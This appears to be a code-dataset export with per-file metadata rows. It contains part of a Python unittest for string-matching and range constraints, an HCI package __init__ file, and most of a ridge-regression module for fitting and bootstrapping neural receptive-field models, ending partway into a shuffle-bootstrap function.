self.assertTrue(new('ILIKE', '%').evaluate('anything'))
self.assertTrue(new('ILIKE', 'A%D').evaluate('ad'))
self.assertTrue(new('ILIKE', 'A%D').evaluate('abcd'))
self.assertTrue(new('ILIKE', 'aa.()!{[]^%$').evaluate('AA.()!{[]^zzz$'))
self.assertTrue(new('ILIKE', 'a__d%').evaluate('abcdefg'))
self.assertTrue(new('ILIKE', 'a__d%').evaluate('ABCDEFG'))
self.assertFalse(new('ILIKE', 'a%').evaluate('b'))
self.assertFalse(new('ILIKE', 'a%').evaluate('ba'))
self.assertFalse(new('ILIKE', '%a').evaluate('b'))
self.assertFalse(new('ILIKE', '%a').evaluate('ab'))
self.assertFalse(new('ILIKE', 'a%d').evaluate('da'))
self.assertFalse(new('ILIKE', 'a__d%').evaluate('abccdefg'))
self.assertFalse(new('ILIKE', '....').evaluate('aaaa'))
self.assertFalse(new('ILIKE', '.*').evaluate('anything'))
def testEvaluateBetween(self):
# cannot make "between" with RequestConstraint.new()
new = self._newRequestConstraint
self.assertTrue(new('BETWEEN', '1--1').evaluate(1))
self.assertTrue(new('BETWEEN', '1--10').evaluate(1))
self.assertTrue(new('BETWEEN', '1--10').evaluate(5))
self.assertTrue(new('BETWEEN', '1--10').evaluate(10))
self.assertTrue(new('BETWEEN', '1.0--1.1').evaluate(1.0))
self.assertTrue(new('BETWEEN', '1.0--1.1').evaluate(1.05))
self.assertTrue(new('BETWEEN', '1.0--1.1').evaluate(1.1))
self.assertTrue(new('BETWEEN', 'a--x').evaluate('a'))
self.assertTrue(new('BETWEEN', 'a--x').evaluate('j'))
self.assertTrue(new('BETWEEN', 'a--x').evaluate('x'))
self.assertFalse(new('BETWEEN', '1--1').evaluate(2))
self.assertFalse(new('BETWEEN', '1--2').evaluate(10))
self.assertFalse(new('BETWEEN', '1--10').evaluate(0))
self.assertFalse(new('BETWEEN', '1--10').evaluate(11))
self.assertFalse(new('BETWEEN', '1.0--1.1').evaluate(0.99))
self.assertFalse(new('BETWEEN', '1.0--1.1').evaluate(1.11))
self.assertFalse(new('BETWEEN', 'a--x').evaluate(' '))
self.assertFalse(new('BETWEEN', 'a--x').evaluate('z'))
| 49.446903 | 96 | 0.575749 | 1,276 | 11,175 | 5.031348 | 0.085423 | 0.202804 | 0.246262 | 0.102804 | 0.85405 | 0.75109 | 0.723832 | 0.582243 | 0.572741 | 0.470561 | 0 | 0.034241 | 0.184609 | 11,175 | 225 | 97 | 49.666667 | 0.670325 | 0.038031 | 0 | 0.098446 | 0 | 0 | 0.102385 | 0 | 0 | 0 | 0 | 0 | 0.823834 | 1 | 0.072539 | false | 0 | 0.010363 | 0 | 0.093264 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5c73cc7a01f174eb64abd1ee0a0082418ae379cc | 177 | py | Python | hci/event/events/__init__.py | svdpuranik/python-hci | 4920f9555d32704ea918f7ae5d705b18e78281e5 | [
"MIT"
] | 16 | 2017-11-28T18:06:40.000Z | 2022-02-11T09:19:40.000Z | hci/event/events/__init__.py | svdpuranik/python-hci | 4920f9555d32704ea918f7ae5d705b18e78281e5 | [
"MIT"
] | 3 | 2017-12-19T11:19:55.000Z | 2018-01-04T18:32:44.000Z | hci/event/events/__init__.py | svdpuranik/python-hci | 4920f9555d32704ea918f7ae5d705b18e78281e5 | [
"MIT"
] | 9 | 2017-12-18T19:39:10.000Z | 2022-01-25T01:43:03.000Z | from .vendor_specific_event import VendorSpecificEvent
from .hci_command_complete import HCI_CommandComplete
from .vendor_specific import *
from .hci_commands_complete import *
| 35.4 | 54 | 0.875706 | 22 | 177 | 6.681818 | 0.5 | 0.136054 | 0.244898 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090395 | 177 | 4 | 55 | 44.25 | 0.913043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5cd5faa2f1657a44298d0ffb37363aed13343667 | 32,258 | py | Python | supplemental_files/strf/ridge.py | HamiltonLabUT/lab_intro_notebooks | be6e8988307b0fe6ccbca3b4052b14022d3b6de6 | [
"BSD-3-Clause"
] | null | null | null | supplemental_files/strf/ridge.py | HamiltonLabUT/lab_intro_notebooks | be6e8988307b0fe6ccbca3b4052b14022d3b6de6 | [
"BSD-3-Clause"
] | null | null | null | supplemental_files/strf/ridge.py | HamiltonLabUT/lab_intro_notebooks | be6e8988307b0fe6ccbca3b4052b14022d3b6de6 | [
"BSD-3-Clause"
] | null | null | null | #import scipy
import numpy as np
import logging
from supplemental_files.strf.utils import mult_diag, counter
import random
import itertools as itools
#from matplotlib import pyplot as plt
zs = lambda v: (v-v.mean(0))/v.std(0) ## z-score function
ridge_logger = logging.getLogger("ridge_corr")
def ridge(stim, resp, alpha, singcutoff=1e-10, normalpha=False, logger=ridge_logger):
"""Uses ridge regression to find a linear transformation of [stim] that approximates
[resp]. The regularization parameter is [alpha].
Parameters
----------
stim : array_like, shape (T, N)
Stimuli with T time points and N features.
resp : array_like, shape (T, M)
Responses with T time points and M separate responses.
alpha : float or array_like, shape (M,)
Regularization parameter. Can be given as a single value (which is applied to
all M responses) or separate values for each response.
normalpha : boolean
Whether ridge parameters should be normalized by the largest singular value of stim. Good for
comparing models with different numbers of parameters.
Returns
-------
wt : array_like, shape (N, M)
Linear regression weights.
"""
try:
U,S,Vh = np.linalg.svd(stim, full_matrices=False)
except np.linalg.LinAlgError:
logger.info("NORMAL SVD FAILED, trying more robust dgesvd..")
from text.regression.svd_dgesvd import svd_dgesvd
U,S,Vh = svd_dgesvd(stim, full_matrices=False)
UR = np.dot(U.T, np.nan_to_num(resp))
#plt.imshow(UR)
# Expand alpha to a collection if it's just a single value
if isinstance(alpha, float):
alpha = np.ones(resp.shape[1]) * alpha
# Normalize alpha by the LSV norm
norm = S[0]
if normalpha:
nalphas = alpha * norm
else:
nalphas = alpha
# Compute weights for each alpha
ualphas = np.unique(nalphas)
wt = np.zeros((stim.shape[1], resp.shape[1]))
for ua in ualphas:
selvox = np.nonzero(nalphas==ua)[0]
#awt = reduce(np.dot, [Vh.T, np.diag(S/(S**2+ua**2)), UR[:,selvox]])
awt = np.dot(Vh.T, np.dot(np.diag(S/(S**2+ua**2)), UR[:,selvox]))
wt[:,selvox] = awt
return wt
def eigridge(stim, resp, alpha, singcutoff=1e-10, normalpha=False, force_cmode=None, covmat=None, Q=None, L=None, logger=ridge_logger):
"""Uses ridge regression with eigenvalue decomposition to find a linear transformation of
[stim] that approximates [resp]. The regularization parameter is [alpha].
Parameters
----------
stim : array_like, shape (T, N)
Stimuli with T time points and N features.
resp : array_like, shape (T, M)
Responses with T time points and M separate responses.
alpha : float or array_like, shape (M,)
Regularization parameter. Can be given as a single value (which is applied to
all M responses) or separate values for each response.
normalpha : boolean
Whether ridge parameters should be normalized by the largest singular value of stim. Good for
comparing models with different numbers of parameters.
Returns
-------
wt : array_like, shape (N, M)
Linear regression weights.
"""
if force_cmode is not None:
cmode = force_cmode
else:
cmode = stim.shape[0]<stim.shape[1]
print("Cmode =",cmode)
if cmode:
print("Number of time points is less than the number of features")
else:
print("Number of time points is greater than the number of features")
logger.info("Doing Eigenvalue decomposition on the full stimulus matrix...")
if cmode: # Make covmat first dim x first dim
if covmat is None:
print("stim shape: ",)
print(stim.shape)
covmat = np.array(np.dot(stim, stim.T))
print( "Covmat shape: ",)
print( covmat.shape)
if Q is None and L is None:
L, Q = np.linalg.eigh(covmat)
print( "COV L.T stim.T resp: ",)
print( stim.T.shape, Q.shape, Q.T.shape, resp.shape)
Q1 = np.dot(stim.T, Q)
Q2 = np.dot(Q.T, resp)
else: # Make covmat second dim x second dim
if covmat is None:
print( "stim shape (not cmode): ", )
print( stim.shape)
covmat = np.array(np.dot(stim.T, stim))
print( "Covmat shape: ",)
print( covmat.shape)
if Q is None and L is None:
L, Q = np.linalg.eigh(covmat)
print( Q.T.shape, stim.T.shape, resp.shape)
QT_XT_Y = np.dot(Q.T, np.dot(stim.T, resp))
# Expand alpha to a collection if it's just a single value
if isinstance(alpha, float):
alpha = np.ones(resp.shape[1]) * alpha
# Compute weights for each alpha
logger.info("Computing weights")
ualphas = np.unique(alpha)
wt = np.zeros((stim.shape[1], resp.shape[1]))
for ua in ualphas:
selected_elec = np.nonzero(alpha==ua)[0]
D = np.diag(1 / (L + ua)) # This is for eigridge
if cmode:
#awt = reduce(np.dot( [Q1, D, Q2[:,selected_elec]]))
awt = np.dot( Q1, np.dot(D, Q2[:,selected_elec]))
else:
awt = np.dot(Q, np.dot(D, QT_XT_Y[:,selected_elec]))
wt[:,selected_elec] = awt
return wt
def ridge_corr(Rstim, Pstim, Rresp, Presp, alphas, normalpha=False, corrmin=0.2,
singcutoff=1e-10, use_corr=True, logger=ridge_logger):
"""Uses ridge regression to find a linear transformation of [Rstim] that approximates [Rresp],
then tests by comparing the transformation of [Pstim] to [Presp]. This procedure is repeated
for each regularization parameter alpha in [alphas]. The correlation between each prediction and
each response for each alpha is returned. The regression weights are NOT returned, because
computing the correlations without computing regression weights is much, MUCH faster.
Parameters
----------
Rstim : array_like, shape (TR, N)
Training stimuli with TR time points and N features. Each feature should be Z-scored across time.
Pstim : array_like, shape (TP, N)
Test stimuli with TP time points and N features. Each feature should be Z-scored across time.
Rresp : array_like, shape (TR, M)
Training responses with TR time points and M responses (voxels, neurons, what-have-you).
Each response should be Z-scored across time.
Presp : array_like, shape (TP, M)
Test responses with TP time points and M responses.
alphas : list or array_like, shape (A,)
Ridge parameters to be tested. Should probably be log-spaced. np.logspace(0, 3, 20) works well.
normalpha : boolean
Whether ridge parameters should be normalized by the largest singular value (LSV) norm of
Rstim. Good for comparing models with different numbers of parameters.
corrmin : float in [0..1]
Purely for display purposes. After each alpha is tested, the number of responses with correlation
greater than corrmin minus the number of responses with correlation less than negative corrmin
will be printed. For long-running regressions this vague metric of non-centered skewness can
give you a rough sense of how well the model is working before it's done.
singcutoff : float
The first step in ridge regression is computing the singular value decomposition (SVD) of the
stimulus Rstim. If Rstim is not full rank, some singular values will be approximately equal
to zero and the corresponding singular vectors will be noise. These singular values/vectors
should be removed both for speed (the fewer multiplications the better!) and accuracy. Any
singular values less than singcutoff will be removed.
use_corr : boolean
If True, this function will use correlation as its metric of model fit. If False, this function
will instead use variance explained (R-squared) as its metric of model fit. For ridge regression
this can make a big difference -- highly regularized solutions will have very small norms and
will thus explain very little variance while still leading to high correlations, as correlation
is scale-free while R**2 is not.
Returns
-------
Rcorrs : array_like, shape (A, M)
The correlation between each predicted response and each column of Presp for each alpha.
"""
## Calculate SVD of stimulus matrix
logger.info("Doing SVD...")
try:
U,S,Vh = np.linalg.svd(Rstim, full_matrices=False)
except np.linalg.LinAlgError:
logger.info("NORMAL SVD FAILED, trying more robust dgesvd..")
from text.regression.svd_dgesvd import svd_dgesvd
U,S,Vh = svd_dgesvd(Rstim, full_matrices=False)
## Truncate tiny singular values for speed
origsize = S.shape[0]
ngoodS = np.sum(S > singcutoff)
nbad = origsize-ngoodS
U = U[:,:ngoodS]
S = S[:ngoodS]
Vh = Vh[:ngoodS]
logger.info("Dropped %d tiny singular values.. (U is now %s)"%(nbad, str(U.shape)))
## Normalize alpha by the LSV norm
norm = S[0]
logger.info("Training stimulus has LSV norm: %0.03f"%norm)
if normalpha:
nalphas = alphas * norm
else:
nalphas = alphas
## Precompute some products for speed
UR = np.dot(U.T, Rresp) ## Precompute this matrix product for speed
PVh = np.dot(Pstim, Vh.T) ## Precompute this matrix product for speed
#Prespnorms = np.apply_along_axis(np.linalg.norm, 0, Presp) ## Precompute test response norms
zPresp = zs(Presp)
#Prespvar = Presp.var(0)
Prespvar_actual = Presp.var(0)
Prespvar = (np.ones_like(Prespvar_actual) + Prespvar_actual) / 2.0
logger.info("Average difference between actual & assumed Prespvar: %0.3f" % (Prespvar_actual - Prespvar).mean())
Rcorrs = [] ## Holds training correlations for each alpha
for na, a in zip(nalphas, alphas):
#D = np.diag(S/(S**2+a**2)) ## Reweight singular vectors by the ridge parameter
D = S / (S ** 2 + na ** 2) ## Reweight singular vectors by the (normalized?) ridge parameter
pred = np.dot(mult_diag(D, PVh, left=False), UR) ## Best (1.75 seconds to prediction in test)
# pred = np.dot(mult_diag(D, np.dot(Pstim, Vh.T), left=False), UR) ## Better (2.0 seconds to prediction in test)
# pvhd = reduce(np.dot, [Pstim, Vh.T, D]) ## Pretty good (2.4 seconds to prediction in test)
# pred = np.dot(pvhd, UR)
# wt = reduce(np.dot, [Vh.T, D, UR]).astype(dtype) ## Bad (14.2 seconds to prediction in test)
# wt = reduce(np.dot, [Vh.T, D, U.T, Rresp]).astype(dtype) ## Worst
# pred = np.dot(Pstim, wt) ## Predict test responses
if use_corr:
#prednorms = np.apply_along_axis(np.linalg.norm, 0, pred) ## Compute predicted test response norms
#Rcorr = np.array([np.corrcoef(Presp[:,ii], pred[:,ii].ravel())[0,1] for ii in range(Presp.shape[1])]) ## Slowly compute correlations
#Rcorr = np.array(np.sum(np.multiply(Presp, pred), 0)).squeeze()/(prednorms*Prespnorms) ## Efficiently compute correlations
Rcorr = (zPresp * zs(pred)).mean(0)
else:
## Compute variance explained
resvar = (Presp - pred).var(0)
Rsq = 1 - (resvar / Prespvar)
Rcorr = np.sqrt(np.abs(Rsq)) * np.sign(Rsq)
Rcorr[np.isnan(Rcorr)] = 0
Rcorrs.append(Rcorr)
log_template = "Training: alpha=%0.3f, mean corr=%0.5f, max corr=%0.5f, over-under(%0.2f)=%d"
log_msg = log_template % (a,
np.mean(Rcorr),
np.max(Rcorr),
corrmin,
(Rcorr>corrmin).sum()-(-Rcorr>corrmin).sum())
logger.info(log_msg)
return Rcorrs
def eigridge_corr(Rstim, Pstim, Rresp, Presp, alphas, normalpha=False, corrmin=0.2,
singcutoff=1e-10, use_corr=True, force_cmode=None, covmat=None, logger=ridge_logger):
"""Uses ridge regression with eigenvalue decomposition (instead of SVD)
to find a linear transformation of [Rstim] that approximates [Rresp],
then tests by comparing the transformation of [Pstim] to [Presp]. This procedure is repeated
for each regularization parameter alpha in [alphas]. The correlation between each prediction and
each response for each alpha is returned. The regression weights are NOT returned, because
computing the correlations without computing regression weights is much, MUCH faster.
Parameters
----------
Rstim : array_like, shape (TR, N)
Training stimuli with TR time points and N features. Each feature should be Z-scored across time.
Pstim : array_like, shape (TP, N)
Test stimuli with TP time points and N features. Each feature should be Z-scored across time.
Rresp : array_like, shape (TR, M)
Training responses with TR time points and M responses (voxels, neurons, what-have-you).
Each response should be Z-scored across time.
Presp : array_like, shape (TP, M)
Test responses with TP time points and M responses.
alphas : list or array_like, shape (A,)
Ridge parameters to be tested. Should probably be log-spaced. np.logspace(0, 3, 20) works well.
normalpha : boolean
Whether ridge parameters should be normalized by the largest singular value (LSV) norm of
Rstim. Good for comparing models with different numbers of parameters.
corrmin : float in [0..1]
Purely for display purposes. After each alpha is tested, the number of responses with correlation
greater than corrmin minus the number of responses with correlation less than negative corrmin
will be printed. For long-running regressions this vague metric of non-centered skewness can
give you a rough sense of how well the model is working before it's done.
singcutoff : float
The first step in ridge regression is computing the singular value decomposition (SVD) of the
stimulus Rstim. If Rstim is not full rank, some singular values will be approximately equal
to zero and the corresponding singular vectors will be noise. These singular values/vectors
should be removed both for speed (the fewer multiplications the better!) and accuracy. Any
singular values less than singcutoff will be removed.
use_corr : boolean
If True, this function will use correlation as its metric of model fit. If False, this function
will instead use variance explained (R-squared) as its metric of model fit. For ridge regression
this can make a big difference -- highly regularized solutions will have very small norms and
will thus explain very little variance while still leading to high correlations, as correlation
is scale-free while R**2 is not.
Returns
-------
Rcorrs : array_like, shape (A, M)
The correlation between each predicted response and each column of Presp for each alpha.
"""
if force_cmode is not None:
cmode = force_cmode
else:
cmode = Rstim.shape[0]<Rstim.shape[1]
# print( "Cmode =",cmode)
# if cmode:
# print( "Number of time points is less than the number of features")
# else:
# print( "Number of time points is greater than the number of features")
logger.info("Doing Eigenvalue decomposition...")
if cmode: # Make covmat first dim x first dim
if covmat is None:
#print( "Rstim shape: ",)
#print( Rstim.shape)
covmat = np.array(np.dot(Rstim, Rstim.T))
#print( "Covmat shape: ",)
#print( covmat.shape)
L, Q = np.linalg.eigh(covmat)
#print( "COV L.T Rstim.T Rresp: ",)
#print( Rstim.T.shape, Q.shape, Q.T.shape, Rresp.shape)
Q1 = np.dot(Rstim.T, Q)
Q2 = np.dot(Q.T, Rresp)
else: # Make covmat second dim x second dim
if covmat is None:
#print( "Rstim shape (not cmode): ", )
#print( Rstim.shape)
covmat = np.array(np.dot(Rstim.T, Rstim))
#print( "Covmat shape: ",)
#print( covmat.shape)
L, Q = np.linalg.eigh(covmat)
#print( Q.T.shape, Rstim.T.shape, Rresp.shape)
QT_XT_Y = np.dot(Q.T, np.dot(Rstim.T, Rresp))
# USV^T, mat = Q*L*Q.T
## Precompute some products for speed
XQ = np.dot(Pstim, Q) ## Precompute this matrix product for speed
#Prespnorms = np.apply_along_axis(np.linalg.norm, 0, Presp) ## Precompute test response norms
zPresp = zs(Presp)
Prespvar = Presp.var(0)
#Prespvar_actual = Presp.var(0)
#Prespvar = (np.ones_like(Prespvar_actual) + Prespvar_actual) / 2.0
#logger.info("Average difference between actual & assumed Prespvar: %0.3f" % (Prespvar_actual - Prespvar).mean())
Rcorrs = [] ## Holds training correlations for each alpha
for a in alphas:
D = 1 / (L + a) # This is for eigridge
# if cmode:
# pred = np.dot(PStim, reduce(np.dot([Q1, D, Q2])))
# else:
# pred = np.dot(PStim, reduce(np.dot([Q, D, QT_XT_Y])))
pred = np.dot(mult_diag(D, XQ, left=False), QT_XT_Y) ## Best (1.75 seconds to prediction in test)
# pred = np.dot(mult_diag(D, np.dot(Pstim, Vh.T), left=False), UR) ## Better (2.0 seconds to prediction in test)
# pvhd = reduce(np.dot, [Pstim, Vh.T, D]) ## Pretty good (2.4 seconds to prediction in test)
# pred = np.dot(pvhd, UR)
# wt = reduce(np.dot, [Vh.T, D, UR]).astype(dtype) ## Bad (14.2 seconds to prediction in test)
# wt = reduce(np.dot, [Vh.T, D, U.T, Rresp]).astype(dtype) ## Worst
# pred = np.dot(Pstim, wt) ## Predict test responses
if use_corr:
#prednorms = np.apply_along_axis(np.linalg.norm, 0, pred) ## Compute predicted test response norms
#Rcorr = np.array([np.corrcoef(Presp[:,ii], pred[:,ii].ravel())[0,1] for ii in range(Presp.shape[1])]) ## Slowly compute correlations
#Rcorr = np.array(np.sum(np.multiply(Presp, pred), 0)).squeeze()/(prednorms*Prespnorms) ## Efficiently compute correlations
Rcorr = (zPresp * zs(pred)).mean(0)
else:
## Compute variance explained
resvar = (Presp - pred).var(0)
Rsq = 1 - (resvar / Prespvar)
Rcorr = np.sqrt(np.abs(Rsq)) * np.sign(Rsq)
Rcorr[np.isnan(Rcorr)] = 0
Rcorrs.append(Rcorr)
log_template = "Training: alpha=%0.3f, mean corr=%0.5f, max corr=%0.5f, over-under(%0.2f)=%d"
log_msg = log_template % (a,
np.mean(Rcorr),
np.max(Rcorr),
corrmin,
(Rcorr>corrmin).sum()-(-Rcorr>corrmin).sum())
logger.info(log_msg)
return Rcorrs
def bootstrap_ridge(Rstim, Rresp, Pstim, Presp, alphas, nboots, chunklen, nchunks,
corrmin=0.2, joined=None, singcutoff=1e-10, normalpha=False, single_alpha=False,
use_corr=True, logger=ridge_logger, return_wts=True, use_svd=False):
"""Uses ridge regression with a bootstrapped held-out set to get optimal alpha values for each response.
[nchunks] random chunks of length [chunklen] will be taken from [Rstim] and [Rresp] for each regression
run. [nboots] total regression runs will be performed. The best alpha value for each response will be
averaged across the bootstraps to estimate the best alpha for that response.
If [joined] is given, it should be a list of lists where the STRFs for all the voxels in each sublist
will be given the same regularization parameter (the one that is the best on average).
Parameters
----------
Rstim : array_like, shape (TR, N)
Training stimuli with TR time points and N features. Each feature should be Z-scored across time.
Rresp : array_like, shape (TR, M)
Training responses with TR time points and M different responses (voxels, neurons, what-have-you).
Each response should be Z-scored across time.
Pstim : array_like, shape (TP, N)
Test stimuli with TP time points and N features. Each feature should be Z-scored across time.
Presp : array_like, shape (TP, M)
Test responses with TP time points and M different responses. Each response should be Z-scored across
time.
alphas : list or array_like, shape (A,)
Ridge parameters that will be tested. Should probably be log-spaced. np.logspace(0, 3, 20) works well.
nboots : int
The number of bootstrap samples to run. 15 to 30 works well.
chunklen : int
On each sample, the training data is broken into chunks of this length. This should be a few times
longer than your delay/STRF. e.g. for a STRF with 3 delays, I use chunks of length 10.
nchunks : int
The number of training chunks held out to test ridge parameters for each bootstrap sample. The product
of nchunks and chunklen is the total number of training samples held out for each sample, and this
product should be about 20 percent of the total length of the training data.
corrmin : float in [0..1]
Purely for display purposes. After each alpha is tested for each bootstrap sample, the number of
responses with correlation greater than this value will be printed. For long-running regressions this
can give a rough sense of how well the model works before it's done.
joined : None or list of array_like indices
If you want the STRFs for two (or more) responses to be directly comparable, you need to ensure that
the regularization parameter that they use is the same. To do that, supply a list of the response sets
that should use the same ridge parameter here. For example, if you have four responses, joined could
be [np.array([0,1]), np.array([2,3])], in which case responses 0 and 1 will use the same ridge parameter
(which will be parameter that is best on average for those two), and likewise for responses 2 and 3.
singcutoff : float
The first step in ridge regression is computing the singular value decomposition (SVD) of the
stimulus Rstim. If Rstim is not full rank, some singular values will be approximately equal
to zero and the corresponding singular vectors will be noise. These singular values/vectors
should be removed both for speed (the fewer multiplications the better!) and accuracy. Any
singular values less than singcutoff will be removed.
normalpha : boolean
Whether ridge parameters (alphas) should be normalized by the largest singular value (LSV)
norm of Rstim. Good for rigorously comparing models with different numbers of parameters.
single_alpha : boolean
Whether to use a single alpha for all responses. Good for identification/decoding.
use_corr : boolean
If True, this function will use correlation as its metric of model fit. If False, this function
will instead use variance explained (R-squared) as its metric of model fit. For ridge regression
this can make a big difference -- highly regularized solutions will have very small norms and
will thus explain very little variance while still leading to high correlations, as correlation
is scale-free while R**2 is not.
Returns
-------
wt : array_like, shape (N, M)
Regression weights for N features and M responses.
corrs : array_like, shape (M,)
Validation set correlations. Predicted responses for the validation set are obtained using the regression
weights: pred = np.dot(Pstim, wt), and then the correlation between each predicted response and each
column in Presp is found.
alphas : array_like, shape (M,)
The regularization coefficient (alpha) selected for each voxel using bootstrap cross-validation.
bootstrap_corrs : array_like, shape (A, M, B)
Correlation between predicted and actual responses on randomly held out portions of the training set,
for each of A alphas, M voxels, and B bootstrap samples.
valinds : array_like, shape (TH, B)
The indices of the training data that were used as "validation" for each bootstrap sample.
"""
nresp, nvox = Rresp.shape
valinds = [] # Will hold the indices into the validation data for each bootstrap
Rcmats = []
for bi in counter(range(nboots), countevery=1, total=nboots):
logger.info("Selecting held-out test set..")
allinds = range(nresp)
indchunks = list(zip(*[iter(allinds)]*chunklen))
random.shuffle(indchunks)
heldinds = list(itools.chain(*indchunks[:nchunks]))
notheldinds = list(set(allinds)-set(heldinds))
valinds.append(heldinds)
RRstim = Rstim[notheldinds,:]
PRstim = Rstim[heldinds,:]
RRresp = Rresp[notheldinds,:]
PRresp = Rresp[heldinds,:]
if use_svd:
# Run ridge regression using this test set
Rcmat = ridge_corr(RRstim, PRstim, RRresp, PRresp, alphas,
corrmin=corrmin, singcutoff=singcutoff,
normalpha=normalpha, use_corr=use_corr,
logger=logger)
else:
# Run ridge regression using this test set
Rcmat = eigridge_corr(RRstim, PRstim, RRresp, PRresp, alphas,
corrmin=corrmin, singcutoff=singcutoff,
normalpha=normalpha, use_corr=use_corr,
logger=logger)
Rcmats.append(Rcmat)
# Find best alphas
if nboots>0:
allRcorrs = np.dstack(Rcmats)
else:
allRcorrs = None
if not single_alpha:
if nboots==0:
raise ValueError("You must run at least one cross-validation step to assign "
"different alphas to each response.")
logger.info("Finding best alpha for each voxel..")
if joined is None:
# Find best alpha for each voxel
meanbootcorrs = allRcorrs.mean(2)
bestalphainds = np.argmax(meanbootcorrs, 0)
valphas = alphas[bestalphainds]
else:
# Find best alpha for each group of voxels
valphas = np.zeros((nvox,))
for jl in joined:
# Mean across voxels in the set, then mean across bootstraps
jcorrs = allRcorrs[:,jl,:].mean(1).mean(1)
bestalpha = np.argmax(jcorrs)
valphas[jl] = alphas[bestalpha]
else:
logger.info("Finding single best alpha..")
if nboots==0:
if len(alphas)==1:
bestalphaind = 0
bestalpha = alphas[0]
else:
raise ValueError("You must run at least one cross-validation step "
"to choose best overall alpha, or only supply one"
"possible alpha value.")
else:
meanbootcorr = allRcorrs.mean(2).mean(1)
bestalphaind = np.argmax(meanbootcorr)
bestalpha = alphas[bestalphaind]
valphas = np.array([bestalpha]*nvox)
logger.info("Best alpha = %0.3f"%bestalpha)
if return_wts:
# Find weights
logger.info("Computing weights for each response using entire training set..")
if use_svd:
wt = ridge(Rstim, Rresp, valphas, singcutoff=singcutoff, normalpha=normalpha)
else:
wt = eigridge(Rstim, Rresp, valphas, singcutoff=singcutoff, normalpha=normalpha)
# Predict responses on prediction set
logger.info("Predicting responses for predictions set..")
if wt.shape[0]==Pstim.shape[1]+1:
logger.info("Using intercept in prediction")
pred = np.dot(Pstim, wt[1:]) + wt[0]
else:
pred = np.dot(Pstim, wt)
# Find prediction correlations
nnpred = np.nan_to_num(pred)
if use_corr:
corrs = np.nan_to_num(np.array([np.corrcoef(Presp[:,ii], nnpred[:,ii].ravel())[0,1]
for ii in range(Presp.shape[1])]))
else:
resvar = (Presp-pred).var(0)
Rsqs = 1 - (resvar / Presp.var(0))
corrs = np.sqrt(np.abs(Rsqs)) * np.sign(Rsqs)
return wt, corrs, valphas, allRcorrs, valinds, pred, Pstim ## LH ADDED
else:
return valphas, allRcorrs, valinds
def bootstrap_ridge_shuffle(orig_STRF, Rstim, Rresp, Pstim, Presp, valpha, nboots, chunklen,
corrmin=0.2, joined=None, singcutoff=1e-10, normalpha=False, single_alpha=False,
use_corr=True, logger=ridge_logger, return_wts=False, use_svd=False):
"""Uses ridge regression to get distribution of weights when training set is shuffled (for a "null"
distribution of the weights).
Rresp will be shuffled by permuting the data using random chunks of length [chunklen] for each regression
run. [nboots] total regression runs will be performed. The best alpha value for each response will be
averaged across the bootstraps to estimate the best alpha for that response.
If [joined] is given, it should be a list of lists where the STRFs for all the voxels in each sublist
will be given the same regularization parameter (the one that is the best on average).
Parameters
----------
Rstim : array_like, shape (TR, N)
Training stimuli with TR time points and N features. Each feature should be Z-scored across time.
Rresp : array_like, shape (TR, M)
Training responses with TR time points and M different responses (voxels, neurons, what-have-you).
Each response should be Z-scored across time.
Pstim : array_like, shape (TP, N)
Test stimuli with TP time points and N features. Each feature should be Z-scored across time.
Presp : array_like, shape (TP, M)
Test responses with TP time points and M different responses. Each response should be Z-scored across
time.
alphas : list or array_like, shape (A,)
Ridge parameters that will be tested. Should probably be log-spaced. np.logspace(0, 3, 20) works well.
nboots : int
The number of bootstrap samples to run. 15 to 30 works well.
chunklen : int
On each sample, the training data is broken into chunks of this length. This should be a few times
longer than your delay/STRF. e.g. for a STRF with 3 delays, I use chunks of length 10.
corrmin : float in [0..1]
Purely for display purposes. After each alpha is tested for each bootstrap sample, the number of
responses with correlation greater than this value will be printed. For long-running regressions this
can give a rough sense of how well the model works before it's done.
joined : None or list of array_like indices
If you want the STRFs for two (or more) responses to be directly comparable, you need to ensure that
the regularization parameter that they use is the same. To do that, supply a list of the response sets
that should use the same ridge parameter here. For example, if you have four responses, joined could
be [np.array([0,1]), np.array([2,3])], in which case responses 0 and 1 will use the same ridge parameter
(which will be parameter that is best on average for those two), and likewise for responses 2 and 3.
singcutoff : float
The first step in ridge regression is computing the singular value decomposition (SVD) of the
stimulus Rstim. If Rstim is not full rank, some singular values will be approximately equal
to zero and the corresponding singular vectors will be noise. These singular values/vectors
should be removed both for speed (the fewer multiplications the better!) and accuracy. Any
singular values less than singcutoff will be removed.
normalpha : boolean
Whether ridge parameters (alphas) should be normalized by the largest singular value (LSV)
norm of Rstim. Good for rigorously comparing models with different numbers of parameters.
single_alpha : boolean
Whether to use a single alpha for all responses. Good for identification/decoding.
use_corr : boolean
If True, this function will use correlation as its metric of model fit. If False, this function
will instead use variance explained (R-squared) as its metric of model fit. For ridge regression
this can make a big difference -- highly regularized solutions will have very small norms and
will thus explain very little variance while still leading to high correlations, as correlation
is scale-free while R**2 is not.
Returns
-------
wt : array_like, shape (N, M)
Regression weights for N features and M responses.
corrs : array_like, shape (M,)
Validation set correlations. Predicted responses for the validation set are obtained using the regression
weights: pred = np.dot(Pstim, wt), and then the correlation between each predicted response and each
column in Presp is found.
alphas : array_like, shape (M,)
The regularization coefficient (alpha) selected for each voxel using bootstrap cross-validation.
bootstrap_corrs : array_like, shape (A, M, B)
Correlation between predicted and actual responses on randomly held out portions of the training set,
for each of A alphas, M voxels, and B bootstrap samples.
valinds : array_like, shape (TH, B)
The indices of the training data that were used as "validation" for each bootstrap sample.
"""
nresp, nvox = Rresp.shape
valinds = [] # Will hold the indices into the validation data for each bootstrap
wts = []
mean_diff = np.zeros((orig_STRF.shape[0], orig_STRF.shape[1], nboots))
pvals = np.zeros((orig_STRF.shape[0], orig_STRF.shape[1]))
